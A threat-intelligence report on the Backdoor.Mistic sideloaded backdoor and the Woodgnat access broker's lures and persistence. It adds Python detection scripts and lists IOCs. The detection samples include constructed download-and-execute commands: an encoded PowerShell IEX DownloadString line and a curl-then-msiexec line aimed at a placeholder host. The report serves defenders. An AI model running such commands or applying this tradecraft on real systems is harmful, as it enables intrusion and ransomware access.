Backdoor.Mistic: New Backdoor May be Linked to Ransomware Access Broker

Stealthy new backdoor used in cybercrime intrusions since April 2026 may be associated with Woodgnat (aka KongTuke), an initial access broker whose ModeloRAT toolkit has fed Qilin and other ransomware operations.

Key findings

  • Backdoor.Mistic is a new, stealthy backdoor that has been used in cybercrime intrusions since April 2026.
  • Mistic was in one case deployed in close proximity to ModeloRAT, the Python-based remote access trojan (RAT) developed by Woodgnat (aka KongTuke). 
  • Our Threat Hunter Team has separately observed ModeloRAT used in attacks that deployed Qilin ransomware, linking this tool to ransomware deployment. Woodgnat has been publicly linked to Qilin, Interlock, Rhysida, Akira, 8Base and Black Basta attacks.
  • Mistic was sideloaded by MpExtMs.exe, a legitimate executable, from a DLL named EndpointDlp.dll, a name associated with Microsoft endpoint-security tooling. This helps the backdoor blend in with trusted software.
  • The backdoor runs payloads in memory without writing files to disk and includes a kill switch that lets it delete itself, features consistent with an operator seeking long-term, low-visibility access.
  • Targeting was opportunistic and crossed sectors, with Mistic deployed at organizations in insurance, education, IT and professional services.


A relatively new backdoor that we have called Backdoor.Mistic has been deployed in multiple attacks since April 2026. The backdoor was first documented by Zscaler (which tracks it as MLTBackdoor) earlier this month. Mistic may be linked to the financially motivated initial access broker (IAB) tracked publicly as KongTuke (which we track as Woodgnat), and it was used in one intrusion that also involved the group's ModeloRAT remote access trojan.

Woodgnat reportedly functions primarily as an IAB. Its goal is not to deliver the final payload, but to establish highly durable remote access within an enterprise and sell this high-level access to ransomware affiliates and other attackers for a fee. The Symantec Threat Hunter Team has observed ModeloRAT being used in attacks delivering the Qilin ransomware. 

Backdoor.Mistic

Mistic was first seen in April 2026. It has been deployed on the networks of organizations in a range of sectors, including insurance, education, IT and professional services. Other ModeloRAT and Node.js activity that is likely linked to the same actors was seen at some other organizations from February 2026, but Mistic was not deployed in those incidents. The targeting appears to be opportunistic, with the attackers casting a wide net and then assessing which organizations they could sell access to rather than focusing on a single sector.

The backdoor can run remote payloads directly in memory. It also has typical backdoor capabilities, including:

  • Upload/download a file
  • Move/rename/delete a file
  • Create a folder
  • Modify the frequency with which it checks for another command
  • Execute code from C2 in memory (no file saved on the disk)
  • Terminate and delete itself (Kill switch)

The backdoor is launched via DLL sideloading. In a recent attack investigated by the Symantec Threat Hunter Team, MpExtMs.exe, a legitimate executable, was used to sideload malicious DLLs placed alongside it. A loader DLL (version.dll) hooks GetModuleFileNameW and LoadLibraryW. The GetModuleFileNameW hook returns the legitimate install path of MpExtMs.exe rather than the location it is actually running from. The LoadLibraryW hook redirects library loading so that the malicious EndpointDlp.dll, which is Backdoor.Mistic, is loaded. A .NET DLL was also deployed on the victim network; this is a credential stealer that displays a fake login screen.
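The sideload chain above leaves a recognisable shape in image-load telemetry: a host executable in a user-writable directory loading a DLL that normally lives in System32 from its own directory. The following is an added hunting example, not Symantec's detection content, written against Sysmon Event ID 7-style records (Image / ImageLoaded). The records, PIDs and the drop directory are constructed for the demo. The rule is general: it flags any watch-list DLL loaded from the host executable's own directory rather than a Windows system directory, and separately reports when the same process loaded both version.dll and EndpointDlp.dll.

```python
"""Hunt for the MpExtMs.exe -> version.dll -> EndpointDlp.dll side-load chain
in Sysmon-style image-load records (Event ID 7 fields Image / ImageLoaded).

Added example, not Symantec's detection content. The event records are
constructed; paths, PIDs and the directory name are invented for the demo.
"""
import ntpath
from collections import defaultdict

SYSTEM_DIRS = (r"c:\windows\system32", r"c:\windows\syswow64", r"c:\windows\winsxs")

# DLL names to watch when they are co-located with the host EXE. version.dll is
# the proxy loader and endpointdlp.dll the Mistic payload from the chain above;
# extend the set with other proxy-DLL names you track (assumption).
WATCH_DLLS = {"version.dll", "endpointdlp.dll"}


def _norm(path):
    """Lower-case, normalised Windows path (ntpath works on any host OS)."""
    return ntpath.normpath(path).lower()


def in_system_dir(path):
    """True if the file sits under a Windows system directory (or a subdir of one)."""
    d = ntpath.dirname(_norm(path))
    return any(d == s or d.startswith(s + "\\") for s in SYSTEM_DIRS)


def suspicious_loads(events):
    """Map each host process image to the watch-list DLLs it side-loaded.

    A load is reported when the DLL name is on the watch list, the DLL is not
    in a system directory, and it lives in the same directory as the process
    image (the layout a dropped EXE+DLL pair produces).
    """
    hits = defaultdict(list)
    for ev in events:
        dll = _norm(ev["ImageLoaded"])
        host = _norm(ev["Image"])
        if ntpath.basename(dll) not in WATCH_DLLS:
            continue
        if in_system_dir(dll):
            continue  # the genuine version.dll in System32/SysWOW64
        if ntpath.dirname(dll) == ntpath.dirname(host):
            hits[host].append(dll)
    return dict(hits)


def chain_complete(hits, host):
    """True when a host loaded both the proxy loader and the Mistic payload."""
    names = {ntpath.basename(p) for p in hits.get(_norm(host), [])}
    return {"version.dll", "endpointdlp.dll"} <= names


# Constructed records mirroring the chain above (not real telemetry).
DROP_DIR = r"C:\Users\jdoe\AppData\Local\Temp\pkg"
SAMPLE_EVENTS = [
    {"ProcessId": 4120, "Image": DROP_DIR + r"\MpExtMs.exe", "ImageLoaded": DROP_DIR + r"\version.dll"},
    {"ProcessId": 4120, "Image": DROP_DIR + r"\MpExtMs.exe", "ImageLoaded": r"C:\Windows\System32\kernel32.dll"},
    {"ProcessId": 4120, "Image": DROP_DIR + r"\MpExtMs.exe", "ImageLoaded": DROP_DIR + r"\EndpointDlp.dll"},
    # benign: a signed app pulling the genuine version.dll from System32
    {"ProcessId": 5040, "Image": r"C:\Program Files\Vendor\app.exe", "ImageLoaded": r"C:\Windows\System32\version.dll"},
]

if __name__ == "__main__":
    found = suspicious_loads(SAMPLE_EVENTS)
    for host, dlls in found.items():
        tag = " (full loader+payload chain)" if chain_complete(found, host) else ""
        print(host, "side-loaded:", ", ".join(ntpath.basename(d) for d in dlls) + tag)
```

Run against real Sysmon exports, the benign case to expect is software that legitimately ships its own copy of a system-named DLL in Program Files; those directories are not user-writable and can be added to an allow-list, whereas a copy under AppData or Temp next to a Microsoft-signed host is worth a look every time.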

In addition to Mistic and ModeloRAT, other tools used in that attack included:

  • Curl: Open-source command-line tool for transferring data using various network protocols.
  • Reg.exe: Windows command line tool that can be used to edit the registry of local or remote computers.
  • Net (net.exe): Microsoft tool that can be used to manage network resources.
  • PowerShell: Microsoft scripting tool that can be used to run commands, download payloads, traverse compromised networks, and carry out reconnaissance.
  • Certutil: Microsoft Windows utility that can be used for various malicious purposes, such as to decode information, to download files, and to install browser root certificates.
  • WMIC (Windows Management Instrumentation Command-line): Microsoft command-line tool that can be used to execute commands on remote computers.

Because Mistic executes payloads in memory and can remove itself on command, it leaves few artifacts on disk, potentially allowing attackers long-term, low-visibility access.

Woodgnat

Woodgnat is a financially motivated cybercrime operation that has been active since at least May 2024. It has been publicly linked to multiple ransomware operations, including Qilin, Interlock, Rhysida, Akira, 8Base and Black Basta. Its malicious traffic distribution system is mainly built on compromised WordPress sites, which it uses to deliver an evolving series of social-engineering lures that trick users into executing attacker-supplied commands. 

The group is believed to gain control of these sites through a combination of vulnerable or misconfigured plugins, stolen or purchased credentials, and phishing. Injected JavaScript profiles site visitors and serves social-engineering lures that have evolved over time. 

  • ClickFix (used in early 2025) - Attackers use fake error or fake CAPTCHA tests to trick users into pasting malicious scripts into the Windows Run dialog under the guise of fixing a technical error.
  • FileFix (adopted in mid-2025) - Attackers trick users into manually pasting and executing malicious commands directly inside the Windows File Explorer address bar.
  • CrashFix (observed in early 2026) - Attackers deliberately crash a victim’s web browser and trick them into manually executing code under the guise of “fixing” the crash.

Zscaler reported that Mistic was delivered via a ClickFix infection chain, a lure type Woodgnat is known to use. This is another low-confidence indication that Mistic may be linked to the group.

In each case the victim is ultimately tricked into running an attacker-supplied PowerShell command. While the initial compromise may be opportunistic, the attackers then profile each compromised machine to determine its value and whether access to it can be sold.

Since around April 2026, Woodgnat has also been observed using helpdesk and IT-support pretexts delivered through external Microsoft Teams chats to walk targeted users through a “paste-and-run” sequence. In reported cases the operator rotated through multiple Microsoft 365 tenants over an extended period to blunt reactive blocking and reached persistent access within minutes of the victim pasting a single PowerShell command.
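Every lure described above (ClickFix, FileFix, CrashFix and the Teams helpdesk pretext) ends the same way: the user pastes a command into the Run dialog or the File Explorer address bar, so the resulting shell is a direct child of explorer.exe. That parent-child pair alone is noisy (people open terminals), but combined with a hidden window, an encoded command or a download-and-execute primitive it is a strong signal. The following is an added detection example, not Symantec's content, written against Sysmon Event ID 1-style records; the command lines, the encoded stage-one script, the PIDs and the URL are constructed.

```python
"""Flag "paste-and-run" executions: a shell spawned straight from explorer.exe
(Run dialog, File Explorer address bar) with the hidden/encoded/download traits
the ClickFix, FileFix, CrashFix and Teams-helpdesk lures rely on.

Added example, not Symantec's detection content. Records mimic Sysmon Event
ID 1 fields; the command lines and the URL are constructed.
"""
import base64
import ntpath
import re

PASTE_HOSTS = {"explorer.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}

# longest alias first so "-enc" is not consumed as "-e" + garbage
ENC_RX = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.I)
HIDDEN_RX = re.compile(
    r"-(?:windowstyle|window|win|w)\s+hidden|-(?:noprofile|nop)\b|-(?:executionpolicy|ep)\s+bypass", re.I)
DOWNLOAD_RX = re.compile(
    r"invoke-expression|\biex\b|downloadstring|downloadfile|invoke-webrequest|\biwr\b"
    r"|\bcurl\b|certutil|msiexec|bitsadmin|start-bitstransfer", re.I)


def decode_encoded_command(cmdline):
    """Return the UTF-16LE script behind -EncodedCommand, or None."""
    m = ENC_RX.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def assess(event):
    """Score one process-creation record; None when the parent/child pair is uninteresting."""
    parent = ntpath.basename(event["ParentImage"]).lower()
    image = ntpath.basename(event["Image"]).lower()
    if parent not in PASTE_HOSTS or image not in SHELLS:
        return None
    cmd = event["CommandLine"]
    decoded = decode_encoded_command(cmd)
    visible = cmd if decoded is None else cmd + "\n" + decoded  # inspect the decoded script too
    reasons = []
    if decoded is not None:
        reasons.append("encoded command")
    if HIDDEN_RX.search(cmd):
        reasons.append("hidden window / profile or policy bypass")
    if DOWNLOAD_RX.search(visible):
        reasons.append("download-and-execute primitive")
    return {"image": image, "reasons": reasons, "decoded": decoded}


def is_paste_and_run(event, min_reasons=1):
    """explorer.exe -> shell is normal on its own; require at least `min_reasons`
    lure traits on top of it (assumption: tune the threshold for your fleet)."""
    a = assess(event)
    return a is not None and len(a["reasons"]) >= min_reasons


# Constructed records (not real telemetry). The stage-one script is invented.
_STAGE1 = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/u')"
ENCODED = base64.b64encode(_STAGE1.encode("utf-16-le")).decode()
_PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": _PS,
     "CommandLine": f"powershell.exe -w hidden -ep bypass -enc {ENCODED}"},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c curl -s http://example.invalid/update.msi -o %TEMP%\u.msi & msiexec /qn /i %TEMP%\u.msi"},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": _PS,
     "CommandLine": "powershell.exe"},  # user simply opened a console
    {"ParentImage": r"C:\Windows\System32\svchost.exe", "Image": _PS,
     "CommandLine": "powershell.exe -enc " + ENCODED},  # encoded, but not a paste target
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        a = assess(ev)
        print(is_paste_and_run(ev), a["reasons"] if a else "-", ev["CommandLine"][:60])
```

The decoded script is returned alongside the verdict so an analyst sees the stage-one command rather than a base64 blob; on a real fleet the threshold is the knob to turn, since "-nop" alone appears in plenty of admin scripts while an encoded command spawned by explorer.exe almost never does.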

Woodgnat is most readily identified through its use of ModeloRAT, which is typically delivered as part of a portable WinPython package and run via a signed pythonw.exe interpreter, with persistence commonly established under HKCU\Software\Microsoft\Windows\CurrentVersion\Run. The RAT uses RC4-encrypted command-and-control (C2) communications and is built for resilience, with multiple independent C2 paths on separate infrastructure.

Other tools and components that have been reported to be used in Woodgnat attack chains include: 

  • WinPython (WPy64-31401): A legitimate, signed portable Python distribution abused as the carrier and runtime for ModeloRAT. 
  • Node.exe: Legitimate Node.js runtime abused as a script host to execute attacker JavaScript and chain PowerShell and Windows command-line tools. 
  • Finger.exe: Living-off-the-land Windows binary abused from late 2025 to retrieve obfuscated payloads. 
  • NexShield: A malicious Chrome extension impersonating uBlock Origin Lite, distributed via malvertising and used to stage the CrashFix lure. 
  • GateKeeper: A .NET payload featuring layered encryption and extensive anti-analysis and victim-fingerprinting logic. 
  • MintsLoader and D3F@ck Loader: Commodity loaders used to stage follow-on payloads.

Once a command is executed, a multi-stage PowerShell chain downloads and unpacks a portable WinPython environment and launches the ModeloRAT Python scripts. The group then conducts extensive reconnaissance using built-in Windows tooling, enumerating domain users, groups, computers and sessions with net.exe, gathering host and service inventories with PowerShell, and performing Active Directory and Kerberoasting queries against accounts with service principal names to harvest crackable credentials. 

Persistence is established through several redundant mechanisms: Run-key entries that masquerade as legitimate remote-access software (using names such as AnyDesk, Splashtop and Comms), Startup-folder shortcuts, VBScript launchers and scheduled tasks. Data is staged and exfiltrated over HTTP using curl.exe, and the group has been observed capturing screenshots and deploying a credential stealer.
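The Run-key pattern described above and in the ModeloRAT section (a signed pythonw.exe from a portable WinPython tree, or node.exe, launched from a user-writable path under a value name borrowed from remote-access software) is cheap to triage from `reg query` output. The following is an added example, not Symantec's detection content. It parses the text format printed by `reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run`; the sample output is constructed, and the WinPython directory layout shown in it is invented rather than the real distribution's. A value is reported only when it shows two or more of the traits, so a genuine AnyDesk or OneDrive entry under AppData is not flagged on path alone.

```python
r"""Triage HKCU Run values for the ModeloRAT persistence pattern: a script host
(pythonw.exe from a WinPython tree, node.exe) run from a user-writable path
under a value name borrowed from remote-access software.

Added example, not Symantec's detection content. Input is the text printed by
`reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run`; the sample is
constructed and its WinPython layout is invented.
"""
import ntpath
import re

REG_LINE = re.compile(r"^\s+(?P<name>.+?)\s{2,}(?P<type>REG_[A-Z_]+)\s{2,}(?P<data>.*)$")
SCRIPT_HOSTS = {"pythonw.exe", "python.exe", "node.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# Value names the group has been reported to use; flagged when the launched
# executable does not carry the same product name (assumption: substring test).
MASQUERADE_NAMES = ("anydesk", "splashtop", "comms")
USER_WRITABLE_PREFIXES = (r"c:\users\public", r"c:\programdata")


def first_executable(data):
    """Extract the program path from a Run value's command string."""
    data = data.strip()
    if data.startswith('"'):
        end = data.find('"', 1)
        return data[1:end] if end > 0 else data[1:]
    return data.split(" ", 1)[0]


def user_writable(path):
    """Rough test for locations a standard user can write to."""
    p = ntpath.normpath(path).lower()
    return "\\appdata\\" in p or "\\temp\\" in p or p.startswith(USER_WRITABLE_PREFIXES)


def triage_run_entries(reg_output, min_reasons=2):
    """Return the Run values showing at least `min_reasons` suspicious traits."""
    findings = []
    for line in reg_output.splitlines():
        m = REG_LINE.match(line)
        if not m:
            continue  # key header, blank line, or something we do not parse
        name, data = m["name"], m["data"]
        exe = first_executable(data)
        base = ntpath.basename(exe).lower()
        reasons = []
        if base in SCRIPT_HOSTS:
            reasons.append(f"script host {base}")
        if re.search(r"wpy64|winpython", data, re.I):
            reasons.append("WinPython carrier")
        for kw in MASQUERADE_NAMES:
            if kw in name.lower() and kw not in base:
                reasons.append(f"value '{name}' does not launch a {kw} binary")
        if user_writable(exe):
            reasons.append("user-writable path")
        if len(reasons) >= min_reasons:
            findings.append({"name": name, "exe": exe, "reasons": reasons})
    return findings


# Constructed `reg query` output (not real registry data).
SAMPLE_REG_QUERY = r"""
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    OneDrive    REG_SZ    "C:\Users\jdoe\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
    AnyDesk    REG_SZ    "C:\Users\jdoe\AppData\Local\WPy64-31401\python\pythonw.exe" "C:\Users\jdoe\AppData\Local\WPy64-31401\scripts\update.py"
    Comms    REG_SZ    "C:\Users\jdoe\AppData\Roaming\Comms\node.exe" "C:\Users\jdoe\AppData\Roaming\Comms\app.js"
"""

if __name__ == "__main__":
    for f in triage_run_entries(SAMPLE_REG_QUERY):
        print(f["name"], "->", f["exe"])
        for r in f["reasons"]:
            print("   ", r)
```

The same checks apply unchanged to HKLM Run values, Startup-folder .lnk targets and scheduled-task actions once the launch command has been extracted; the distinguishing trait in each case is the script host, not the persistence location.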

A consistent feature of Woodgnat tradecraft is an emphasis on operational resilience and evasion. The ModeloRAT toolkit has been reported to use a pool of multiple C2 servers with sequential failover and several independent access paths on separate infrastructure, while non-domain-joined victims receive a more heavily obfuscated variant that uses a domain-generation algorithm to cycle through fresh C2 domains each week. Lure and loader stages routinely profile the victim host for analysis tools and virtual-machine indicators and distinguish domain-joined corporate machines from standalone WORKGROUP hosts so that the higher-value ModeloRAT payload is reserved for enterprise targets.

Woodgnat's targeting is largely opportunistic, reflecting its role as an initial access broker. It is unclear where Woodgnat is based. The group is assessed to be a financially motivated cybercrime operation rather than a state-sponsored actor, consistent with its initial-access-broker business model and its sale of access to ransomware affiliates. 

Conclusion

The use of custom tools in ransomware attacks is becoming more common, with multiple recent examples of ransomware groups using custom exfiltration and other tools. Backdoor.Mistic appears to continue this trend, although it was most likely developed by an access broker working with ransomware affiliates rather than by a ransomware group itself. 

The stealth of the backdoor is also notable, as is the possibility that Woodgnat is also behind the development of ModeloRAT. Together these point to a group that is highly skilled at building stealthy remote access tools, and one that should be actively tracked, since it may continue to develop custom tooling and widen the pool of ransomware actors it works with. The broader shift is worth watching too: until recently ransomware actors preferred living-off-the-land and dual-use tools, so the increased use of custom tools may signal a change in how these operations work.


Protection/Mitigation

For the latest protection updates, please visit the Symantec Protection Bulletin.


Indicators of Compromise (IOCs)

File indicators

1e41c7bfaa6aa3b93b6cc024274a10e33f3e12fe7c98c1db387ef8927f9d1984 - Backdoor.Mistic - endpointdlp.dll
34d798a6c55e57ed0932b6499f4fbcb5454bdfca903307be101a0594b0ac07bc - Fake lock screen - f.dll
3f797a639bc855bc6d5471f327924b62d10900ddec49b970eca6604142bbb4be - Backdoor.Mistic - aeff97fe.msi
59e3c4cb06331b4f2d78a9a0592f3747e573bd01c5a7650c26361d1e25520712 - Loader for backdoor - version.dll
8c935feec4bd05d5d918df308be417532fb42608fb989a08eab183e0ae699235 - Likely privilege escalation - n.dll
afd5f1ed45a9867daf3bc64152cef460a06b164c8183e490db39146d4749a82c - Backdoor.Mistic - endpointdlp.dll
db972979d508e75fe730d3b72c2701470fbdaeaf8ebdd674744754fa44438ca5 - Backdoor.Mistic - endpointdlp.dll
f591275a8f014b29e567529d67c54eb7bb4473db1c38737d6bfd5b3d52c9344e - Backdoor.Mistic - 48b47c0.msi
fb3630822b70bacb56aa4cec29b5a0e3e9acb3920809e70310a4003385a6d34a - Backdoor.Mistic - endpointdlp.dll

 

Network indicators
142.93.242.144
144.31.53.78
198.13.159.44
199.91.221.42
authorized-logins.net
b6w9m2z5x8q1v3k.top
carrolc.com
cj06y9v4xab.com
cwrtwright.com
defs.updater-worelos.com
ftps.upd-domain-goloro.com
grande-luna.top
hxxp://thomphon.com/update.msi
human-check.top
mail.authorized-logins.net
mailes.upd-domain-goloro.com
mails.updater-worelos.com
mueleer.com
nano.upscale-kolo.com
oeannon.com
php.authorized-logins.net
rotoa-upda-lo.com
sql-updater-service.com
sss.authorized-logins.net
thomphon.com
upd-domain-goloro.com
update.update-fall.com
updater-worelos.com
upscale-kolo.com
w3xasv14culvnqj.top
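The network indicators above mix bare IPs, domains, subdomains and one defanged URL (hxxp://), and several listed hosts are subdomains of other listed domains. A matcher that refangs the URL entry, treats IPs and domains separately and matches on parent domains catches sub-hosts that are not individually listed. The following is an added example, not Symantec tooling. IOC_TEXT is a subset copied from the list above; the proxy-log lines are constructed (timestamps, client IPs, the cdn. sub-host and the benign request are invented).

```python
"""Match proxy-log URLs against the indicator list, handling the defanged
hxxp:// entry and matching sub-domains of listed domains.

Added example, not Symantec tooling. IOC_TEXT is a subset of the list above;
the log lines are constructed.
"""
import ipaddress
from urllib.parse import urlsplit

IOC_TEXT = """
199.91.221.42
authorized-logins.net
mail.authorized-logins.net
upscale-kolo.com
hxxp://thomphon.com/update.msi
thomphon.com
"""


def parse_iocs(text):
    """Split a mixed indicator list into (ips, domains, urls), refanging hxxp / [.]."""
    ips, domains, urls = set(), set(), set()
    for raw in text.splitlines():
        tok = raw.strip().lower().replace("hxxp", "http").replace("[.]", ".")
        if not tok:
            continue
        if "://" in tok:
            urls.add(tok)
            domains.add(urlsplit(tok).hostname)  # the URL's host is an indicator too
            continue
        try:
            ips.add(str(ipaddress.ip_address(tok)))
        except ValueError:
            domains.add(tok)
    return ips, domains, urls


def host_matches(host, domains):
    """Exact or parent-domain match: cdn.upscale-kolo.com hits upscale-kolo.com."""
    host = host.lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in domains)


def scan_proxy_log(lines, iocs):
    """Return (line, reason) pairs for log lines whose URL touches an indicator.

    Expected line layout (constructed): '<ts> <client> <method> <url> <status>'.
    """
    ips, domains, urls = iocs
    hits = []
    for line in lines:
        parts = line.split()
        if len(parts) < 4:
            continue
        url = parts[3].lower()
        host = urlsplit(url).hostname
        if host is None:
            continue
        if url in urls:
            hits.append((line, "exact URL"))
        elif host in ips:
            hits.append((line, "IP indicator"))
        elif host_matches(host, domains):
            hits.append((line, "domain indicator"))
    return hits


# Constructed proxy log (not real traffic).
SAMPLE_LOG = [
    "2026-05-02T10:14:03Z 10.1.2.33 GET http://thomphon.com/update.msi 200",
    "2026-05-02T10:14:09Z 10.1.2.33 POST http://cdn.upscale-kolo.com/api 200",
    "2026-05-02T10:15:41Z 10.1.2.33 GET http://199.91.221.42/c 200",
    "2026-05-02T10:16:00Z 10.1.2.40 GET https://www.microsoft.com/ 200",
]

if __name__ == "__main__":
    for line, reason in scan_proxy_log(SAMPLE_LOG, parse_iocs(IOC_TEXT)):
        print(reason.ljust(17), line)
```

Parent-domain matching is deliberate: the list above includes both authorized-logins.net and three of its sub-hosts, and an operator who rotates sub-hosts under the same registered domain should still trip the match.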
